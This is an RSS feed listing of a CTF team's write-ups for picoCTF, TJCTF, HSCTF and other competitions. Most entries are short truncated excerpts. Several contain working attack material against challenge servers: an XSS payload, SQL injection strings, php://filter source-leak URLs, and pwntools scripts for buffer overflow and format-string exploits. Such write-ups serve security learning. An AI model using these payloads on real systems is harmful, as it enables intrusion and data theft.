https://redpwn.net/ Recent content in Home on redpwn Hugo -- gohugo.io en-us Thu, 28 May 2020 00:00:00 +0000 https://redpwn.net/writeups/tjctf2020/cookiemonster/ Thu, 28 May 2020 00:00:00 +0000 https://redpwn.net/writeups/tjctf2020/cookiemonster/ TJCTF 2020 - Cookie Monster The flag existed in two parts in a massive 1 GB memory dump. The challenge was honestly pretty cool. We had a ton of fun solving it. It was only slightly stressful because we knew b1c was on our tail. Contrary to what you might think, Cookie Monster wasn’t very challenging. redpwn—in all of its creativity—came up with an even more fun challenge on top of Cookie Monster for itself. https://redpwn.net/writeups/tjctf2020/fblibrary/ Thu, 28 May 2020 00:00:00 +0000 https://redpwn.net/writeups/tjctf2020/fblibrary/ TJCTF 2020 - fb library The fb library challenge’s application is vulnerable to reflected XSS through search queries at https://fb_library.tjctf.org/search?q={xss}. However, the payload has an 18 byte restriction on it as the application truncates queries longer than 18 bytes and appends ... to them before writing to the page. So, as window.name is attacker-controlled, we came up with <script>eval(name)/* as the payload. Thankfully, the CSP whitelisted eval. All we did was simply create the following page to create an exploit page containing something along the lines of: https://redpwn.net/writeups/tjctf2020/homerolled/ Thu, 28 May 2020 00:00:00 +0000 https://redpwn.net/writeups/tjctf2020/homerolled/ TJCTF 2020 - Home Rolled Problem It’s that time of year again… time to home roll your own crypto! Since pesky CTF players keep breaking my schemes, this time I obfuscated the source code, so you’ll never be able to figure out what it’s doing. I also used cutting-edge Python 3.8 syntax! Security by obscurity! nc p1.tjctf.org 8012 Solution The source is given in this challenge; unfortunately, it is a bit obfuscated: https://redpwn.net/writeups/tjctf2020/jarvis/ Thu, 28 May 2020 00:00:00 +0000 https://redpwn.net/writeups/tjctf2020/jarvis/ TJCTF 2020 - Jarvis Looking at the files we are given, we realized that the challenge is a binary classification task. A simple search reveals this script which we adapted to the help.csv dataset. from numpy import loadtxt import tensorflow as tf from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense help_dataset = loadtxt("help.csv", delimiter=",") x = help_dataset[:, 1:10] y = help_dataset[:, 0] model = Sequential() model.add(Dense(12, input_dim=9, activation="relu")) model.add(Dense(8, activation="relu")) model. https://redpwn.net/writeups/dawgctf2020/thehackerone/ Mon, 13 Apr 2020 00:00:00 +0000 https://redpwn.net/writeups/dawgctf2020/thehackerone/ DawgCTF - the Hacker One - Writeup The Hacker One was a web / networking challenge in DawgCTF worth 500 points. It was written by a sponsor, HackerOne. Initial Reconnaissance First, as the challenge is supposed to be modelled after a bug bounty program, and as bug bounty hunting typically requires a great deal of reconnaissance, we began by port scanning umbc.h1ctf.com. nmap umbc.h1ctf.com Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 20:35 PDT Nmap scan report for umbc. https://redpwn.net/writeups/picoctf2019/b1g_mac/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/b1g_mac/ B1g_Mac - 500 points Description Here’s a zip file. You can also find the file in /problems/b1g-mac_0_ac4b0dbedcd3b0f0097a5f056e04f97a. Flag picoCTF{M4cTim35!} Solution Upon reversing the binary, I noticed a function called _decode that is never called. To have the challenge solve itself all I needed to do was have this function be called in a debugger. I opened main.exe in x32dbg and set a breakpoint at 0x401B5E, the address of call _listdir (the “encode” function). https://redpwn.net/writeups/picoctf2019/cereal-hacker-2/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/cereal-hacker-2/ cereal hacker 2 - 500 points Description Get the admin’s password. https://2019shell1.picoctf.com/problem/62195/ or http://2019shell1.picoctf.com:62195 Solution Using php filters, we can leak the source code. http://2019shell1.picoctf.com:62195/?file=php://filter/convert.base64-encode/resource=admin <?php require_once('cookie.php'); if(isset($perm) && $perm->is_admin()){ ... This has a reference to cookie.php. http://2019shell1.picoctf.com:62195/?file=php://filter/convert.base64-encode/resource=cookie <?php require_once('../sql_connect.php'); // I got tired of my php sessions expiring, so I just put all my useful information in a serialized cookie ... This has a reference to sql_connect.php which looks interesting. https://redpwn.net/writeups/picoctf2019/client-side-again/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/client-side-again/ Client-side-again - 200 points Description Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/12278/ (link) or http://2019shell1.picoctf.com:12278 Flag picoCTF{not_this_again_40a0d8} Solution Looking at the page at https://2019shell1.picoctf.com/problem/12278/ we see the following JavaScript code to validate passwords/flags: var _0x5a46=['0a0d8}','_again_4','this','Password\x20Verified','Incorrect\x20password','getElementById','value','substring','picoCTF{','not_this'];(function(_0x4bd822,_0x2bd6f7){var _0xb4bdb3=function(_0x1d68f6){while(--_0x1d68f6){_0x4bd822['push'](_0x4bd822['shift']());}};_0xb4bdb3(++_0x2bd6f7);}(_0x5a46,0x1b3));var _0x4b5b=function(_0x2d8f05,_0x4b81bb){_0x2d8f05=_0x2d8f05-0x0;var _0x4d74cb=_0x5a46[_0x2d8f05];return _0x4d74cb;};function verify(){checkpass=document[_0x4b5b('0x0')]('pass')[_0x4b5b('0x1')];split=0x4;if(checkpass[_0x4b5b('0x2')](0x0,split*0x2)==_0x4b5b('0x3')){if(checkpass[_0x4b5b('0x2')](0x7,0x9)=='{n'){if(checkpass[_0x4b5b('0x2')](split*0x2,split*0x2*0x2)==_0x4b5b('0x4')){if(checkpass[_0x4b5b('0x2')](0x3,0x6)=='oCT'){if(checkpass[_0x4b5b('0x2')](split*0x3*0x2,split*0x4*0x2)==_0x4b5b('0x5')){if(checkpass['substring'](0x6,0xb)=='F{not'){if(checkpass[_0x4b5b('0x2')](split*0x2*0x2,split*0x3*0x2)==_0x4b5b('0x6')){if(checkpass[_0x4b5b('0x2')](0xc,0x10)==_0x4b5b('0x7')){alert(_0x4b5b('0x8'));}}}}}}}}else{alert(_0x4b5b('0x9'));}} The first thing I did was pull up http://www.jsnice.org/: 'use strict'; /** @type {!Array} */ var _0x5a46 = ["0a0d8}", "_again_4", "this", "Password Verified", "Incorrect password", "getElementById", "value", "substring", "picoCTF{", "not_this"]; (function(data, i) { /** * @param {number} isLE * @return {undefined} */ var write = function(isLE) { for (; --isLE;) { data["push"](data["shift"]()); } }; write(++i); })(_0x5a46, 435); /** * @param {string} level * @param {? https://redpwn.net/writeups/picoctf2019/empire1/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/empire1/ Empire1 - 400 points Description Psst, Agent 513, now that you’re an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/4155/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:4155 Flag picoCTF{wh00t_it_a_sql_inject29944a88} Solution The SQL injection vulnerability through the Todo titles is fairly obvious. A simple ' is enough to cause an SQL syntax error. Our winning payload was: https://redpwn.net/writeups/picoctf2019/empire2/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/empire2/ Empire2 - 450 points Description Well done, Agent 513! Our sources say Evil Empire Co is passing secrets around when you log in: https://2019shell1.picoctf.com/problem/6362/ (link), can you help us find it? or http://2019shell1.picoctf.com:6362 Flag picoCTF{its_a_me_your_flag6426d097} Solution The first thing I did was to test for SQL injection. It didn’t look like this was vulnerable. There were users named things that looked like SSTI payloads, so the next thing I tried was also SSTI through the card name. https://redpwn.net/writeups/picoctf2019/empire3/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/empire3/ Empire3 - 500 points Description Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? https://2019shell1.picoctf.com/problem/32252/ (link) or http://2019shell1.picoctf.com:32252 Flag picoCTF{cookies_are_a_sometimes_food_dd5a4e43} Solution Empire2 had gone by pretty quickly. At this point, I just wanted to confirm to myself that they followed the pattern of the other two Empire challenges and had used a new vulnerability in the cards/todo titles. https://redpwn.net/writeups/picoctf2019/ghost_diary/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/ghost_diary/ Ghost_Diary - 500 points Flag picoCTF{nu11_byt3_Gh05T_41a29ece} Analysis $ ldd ghostdiary linux-vdso.so.1 (0x00007ffcabdd4000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff81dd18000) /lib64/ld-linux-x86-64.so.2 (0x00007ff81e30c000) $ strings /lib/x86_64-linux-gnu/libc.so.6 | grep GNU GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27. Compiled by GNU CC version 7.3.0. $ checksec ghostdiary Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled The libc version is 2.27 which implies the use of tcache with very little security checks. https://redpwn.net/writeups/picoctf2019/investigation_encoded_2/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/investigation_encoded_2/ investigation_encoded_2 - 500 points Description We have recovered a binary and 1 file: image01. See what you can make of it. Its also found in /problems/investigation-encoded-2_0_bf594e1542e760d4c72cc1401d71b3eb on the shell server. NOTE: The flag is not in the normal picoCTF{XXX} format. Flag t1m3f1i35000000000003d746a40 Solution This challenge is similar to investigation_encoded_1, except there is a login function that prevents the binary from executing the encode function. We patch the binary so we can bypass the call to the login function, then do the same approach as investigation_encoded_1: brute force flag until it matches for every possible character with a script. https://redpwn.net/writeups/picoctf2019/irish-name-repo-2/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/irish-name-repo-2/ Irish-Name-Repo 2 - 350 points Description There is a website running at https://2019shell1.picoctf.com/problem/58043/ (link). Someone has bypassed the login before, and now it’s being strengthened. Try to see if you can still login! or http://2019shell1.picoctf.com:58043 Flag picoCTF{m0R3_SQL_plz_c9c1c726} Solution Okay, so we already know that the vulnerability is SQL injection from the last challenge. We try to inject simple payloads like ' OR 1=1 -- but there seems to be some kind of filter in place. https://redpwn.net/writeups/picoctf2019/irish-name-repo-3/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/irish-name-repo-3/ Irish-Name-Repo 3 - 400 points Description There is a secure website running at https://2019shell1.picoctf.com/problem/4161/ (link) or http://2019shell1.picoctf.com:4161. Try to see if you can login as admin! Flag picoCTF{3v3n_m0r3_SQL_d490b67d} Solution The last challenge was SQL injection so it was safe to assume that this one would be too. The first thing I did was try another simple payload like ' OR 1=1--. Unfortunately, it gave an HTTP 500 error. At that point I realized in the HTTP POST request that it was sending a body parameter debug that was set to 0. https://redpwn.net/writeups/picoctf2019/java_script_kiddie_2/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/java_script_kiddie_2/ Java Script Kiddie 2 - 450 points Description The image link appears broken… twice as badly… https://2019shell1.picoctf.com/problem/32262 or http://2019shell1.picoctf.com:32262 Flag picoCTF{f1ee7ff44419a675d1a0f0a1a91dff4c} Solution This challenge is similar to Java Script Kiddie 1, except the code changed a bit: var bytes = []; $.get("bytes", function(resp) { bytes = Array.from(resp.split(" "), x => Number(x)); }); function assemble_png(u_in){ var LEN = 16; var key = "00000000000000000000000000000000"; var shifter; if(u_in.length == key.length){ key = u_in; } var result = []; for(var i = 0; i < LEN; i++){ shifter = Number(key. https://redpwn.net/writeups/picoctf2019/shark-on-wire-2/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/shark-on-wire-2/ shark on the wire 2 - 300 points Description We found this packet capture. Recover the flag that was pilfered from the network. You can also find the file in /problems/shark-on-wire-2_0_3e92bfbdb2f6d0e25b8d019453fdbf07. Flag picoCTF{p1LLf3r3d_data_v1a_st3g0} Solution Since this is another packet capture challenge, I popped open Wireshark and looked around for a bit. Eventually I stumbled upon some weird looking traffic and wrote a filter to separate it from the rest: udp && ip. https://redpwn.net/writeups/picoctf2019/sice_cream/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/sice_cream/ sice_cream - 500 points Flag flag{th3_r3al_questi0n_is_why_1s_libc_2.23_still_4_th1ng_62167e9e} Analysis $ strings libc.so.6 | grep GNU GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11) stable release version 2.23, by Roland McGrath et al. Compiled by GNU CC version 5.4.0 20160609. GNU Libidn by Simon Josefsson $ checksec sice_cream Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) RUNPATH: './' The libc version is 2.23, meaning that tcache has not been implemented yet. https://redpwn.net/writeups/picoctf2019/zero_to_hero/ Tue, 22 Oct 2019 00:00:00 +0000 https://redpwn.net/writeups/picoctf2019/zero_to_hero/ zero to hero Category: Binary Exploitation Points: 500 Description: Now you’re really cooking. Can you pwn this service?. Connect with nc 2019shell1.picoctf.com 49928. libc.so.6 ld-2.29.so We are given the libc base address, so no leaks are needed. All we have to do is get a write. The issue is that the binary uses libc 2.29, which patches the double free vulnerability (or does it? :o). Googling common exploits in libc 2. https://redpwn.net/writeups/picoctf2018/lambdash3/ Sun, 14 Oct 2018 00:00:00 +0000 https://redpwn.net/writeups/picoctf2018/lambdash3/ Final payload payload Points 800 Description C? Who uses that anymore. If we really want to be secure, we should all start learning lambda calculus. http://2018shell1.picoctf.com:43607 (link) Hints This compiler is 99.9% bug free! I’m sure the other 0.1% won’t amount to anything… Solution The website linked contains information about a new language called LambDash. To access a tutorial page, we GET /?page=client/pages/..., from which we can infer that GETing /? https://redpwn.net/writeups/picoctf2018/be-quick-or-be-dead-3/ Fri, 12 Oct 2018 00:00:00 +0000 https://redpwn.net/writeups/picoctf2018/be-quick-or-be-dead-3/ Problem files be-quick-or-be-dead-3 Solve script solve.py Points 350 Description As the song draws closer to the end, another executable be-quick-or-be-dead-3 suddenly pops up. This one requires even faster machines. Can you run it fast enough too? You can also find the executable in /problems/be-quick-or-be-dead-3_2_fc35b1f6832df902b8e2f724772d012f. Hints How do you speed up a very repetitive computation? How2solve We are given a binary. Running produces the following output. $ . https://redpwn.net/writeups/picoctf2018/circuit123/ Fri, 12 Oct 2018 00:00:00 +0000 https://redpwn.net/writeups/picoctf2018/circuit123/ Problem files map1.txt map2.txt decrypt.py Solve script keygen.py Points 800 Description Can you crack the key to decrypt map2 for us? The key to map1 is 11443513758266689915. Hints Have you heard of z3? How to solve The decrypt.py script takes as input an integer key and a map file. The code does some bizzare operation in verify() to determine if the key is correct, and then decrypts the key to a string. https://redpwn.net/writeups/picoctf2018/dogorfrog/ Fri, 12 Oct 2018 00:00:00 +0000 https://redpwn.net/writeups/picoctf2018/dogorfrog/ Points 900 Description This is a classic machine learning problem. Thankfully, I’ve done a bit of machine learning already. We came across this article and copy much of the template code from there. I wrote my code in a Jupyter notebook. The only problem that I encountered was that of the learning rate. The example’s learning rate was way too small, and resulted in no progress. In order to solve, I set the learning rate to 1e7 and decayed it by 0. https://redpwn.net/writeups/picoctf2018/jbr/ Fri, 12 Oct 2018 00:00:00 +0000 https://redpwn.net/writeups/picoctf2018/jbr/ Points 700 Problem Statement Dr. Xernon has finally approved an update to James Brahm’s spy terminal. (Someone finally told them that ECB isn’t secure.) Fortunately, CBC mode is safe! Right? Connect with nc 2018shell1.picoctf.com 22666. source Hint: What killed SSL3? Research Googling the hint, we come across the POODLE attack. Apparently, this problem uses a weak form of encryption (AES CBC) that we can exploit to get the flag. However, there wasn’t good literature on exactly how to implement this attack. https://redpwn.net/writeups/icectf2018/hard_shells/ Wed, 12 Sep 2018 00:00:00 +0000 https://redpwn.net/writeups/icectf2018/hard_shells/ Points 200 Description After a recent hack, a laptop was seized and subsequently analyzed. The victim of the hack? An innocent mexican restaurant. During the investigation they found this suspicous file. Can you find any evidence that the owner of this laptop is the culprit? Solve $ file hardshells hardshells: Zip archive data, at least v1.0 to extract $ mv hardshells hardshells.zip renamed 'hardshells' -> 'hardshells.zip' Apparently the zip file has a password. https://redpwn.net/writeups/icectf2018/twitter/ Wed, 12 Sep 2018 00:00:00 +0000 https://redpwn.net/writeups/icectf2018/twitter/ Problem files twitter_binary libc.so.6 Solve script solve.py Points 800 Description Someone left a time machine in the basement with classic games from the 1970s. Let me play these on the job, nothing can go wrong. Remarks This was hard. Difficulty Hard Initial experimentation We are given a binary to download and an ssh connection containing the binary and a collection of .ROM files. There is no flag.txt file, making the challenge goal a bit unclear. https://redpwn.net/writeups/hsctf2018/alarm/ Wed, 29 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/hsctf2018/alarm/ Solve script solve.py from pwn import * e = ELF('alarm') what_addr = e.symbols['what'] # Function that gives flag loop_addr = e.symbols['loop'] # Mainloop #p = process('./alarm') p = remote('shell.hsctf.com', 10004) # STAGE 1 # Create alarm to leak offset of symbols. We need to do this becuase this is a # PIE (Position Independent Executable), meaning that all the addresses will be # offset by an unknown amount. The program actually attempts to recognize format # string payloads, which is the reason for the # symbol. https://redpwn.net/writeups/tjctf2018/abyss/ Wed, 29 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/tjctf2018/abyss/ Written by nthistle Problem Statement If you stare into the abyss, the abyss stares back. nc problem1.tjctf.org 8006 Observations The first observation is that this is a Python environment. However, further experimentation reveals that all our errors are eaten up with a cute message. >>> blahblop The Abyss consumed your error. Furthermore, some words seem to be banned. >>> ().__class__ Sorry, '__class__' is not allowed. >>> lol__class__lol Sorry, '__class__' is not allowed. https://redpwn.net/writeups/hsctf2018/caesar/ Mon, 27 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/hsctf2018/caesar/ Source caesar.c Solve script solve.py from pwn import * e = ELF('caesar') give_flag_addr = e.symbols['give_flag'] give_flag_addr = 0x8048886 # idk why I need to do this, but this is the address in gdb # Address of puts in the global offset table # We need this because this will be overwitten with the address of give_flag puts_addr = e.got['puts'] p = remote("shell.hsctf.com", 10003) #p = process('./caesar') print p.recvuntil('Enter text to be encoded: ') # Use pwntools to construct format string payload that writes give_flag_addr # to puts_addr writes = { puts_addr: give_flag_addr } # The 31 here is the distance to the buffer from the top of the stack where # the format string is stored when the printf is called. https://redpwn.net/writeups/crackmes/cmu_binary_bomb/ Mon, 27 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/crackmes/cmu_binary_bomb/ Binary bomb Reversed source code bomb.c FILE *infile; int num_input_strings = 0; char input_strings[...][80]; void initialize_bomb(void) { signal(SIGINT, sig_handler); } void sig_handler(void) { printf("So you think you can stop the bomb with ctrl-c, do you?\n"); sleep(3); printf("Well..."); fflush(stdout); sleep(1); print("OK. :-)\n"); exit(16); } // Returns whether a string has only space characters int blank_line(char *input) { if (input[0] == '\0') { return 1; } for (;;) { int c = *input; input++; if (isspace(c)) { if (*input == '\0') { return 1; } } else { return 0; } } } // Can return NULL char *skip(void) { do { char *input_string = input_strings[num_input_strings]; char *input = fgets(input_string, 80, infile); if (input == NULL) { break; } } while (blank_line(input)); return input; } void explode_bomb(void) { printf("\nBOOM! https://redpwn.net/writeups/hsctf2018/jumper/ Mon, 27 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/hsctf2018/jumper/ Source jumper.c Solve script solve.py from pwn import * e = ELF('jumper') loladdr = p32(e.symbols['lol']) p = remote("shell.hsctf.com", 10001) #p = process('./jumper') print p.recvuntil(': ') p.send('A' * (0x28 + 4) + loladdr) p.interactive() https://redpwn.net/writeups/hsctf2018/review/ Mon, 27 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/hsctf2018/review/ Source review.c Solve script solve.py from pwn import * p = remote("shell.hsctf.com", 10000) p.recvuntil("What was the name of the last movie you watched?\n") p.send('A' * 33) https://redpwn.net/writeups/crackmes/rpi_binary_bomb/ Mon, 27 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/crackmes/rpi_binary_bomb/ Binary bomb Reversed source code bomb.c // Functions that are not relevant to defusing the bomb are marked "STUB" static void libc_start_main(void *arg) { // STUB } static void disarm_handler(void) { // STUB } // Setting all wires to 0 defuses the bomb static int wire_yellow = 1; static int wire_green = 1; static int wire_blue = 1; static int wire_red = 1; /* * This function gets the amount of time left to display in timer. https://redpwn.net/writeups/pactf2018/tiebreakers/ Mon, 27 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/pactf2018/tiebreakers/ Solve script solve.py Writeup We are given a server, and our task is to make the server respond to an HTTP GET request with our team name, “meephackerz”. After a bit of testing, we recognize that the server runs in python2, and, and anything we submit is eval’d twice, with the setback that no alphanumeric characters are allowed. Python2 lets us represent arbitrary characters as "%c" % <num>. We now must simply represent 'c' and any arbitrary integer using non alphanumeric characters. https://redpwn.net/writeups/hsctf2018/tiles/ Mon, 27 Aug 2018 00:00:00 +0000 https://redpwn.net/writeups/hsctf2018/tiles/ Solve script tiles.c #include <stdio.h> #define M 5000 #define N 5000 #define BIGPRIME 1000000007 #define exists(a,b) ((0<=(a))&&((a)<M)&&(0<=(b))&&((b)<N)) int main() { static int park[M][N], ways[M][N]; int i, j; FILE *tf = fopen("tiles.txt", "r"); for (i = 0; i < M; ++i) for (j = 0; j < N; ++j) fscanf(tf, "%d", &park[i][j]); puts("Done scanning tiles.txt..."); ways[M-1][0] = 1; for (i = 0; i < M + N; ++i) { for (j = 0; j < N; ++j) { if (exists(M-1-(i-j), j)) { if (!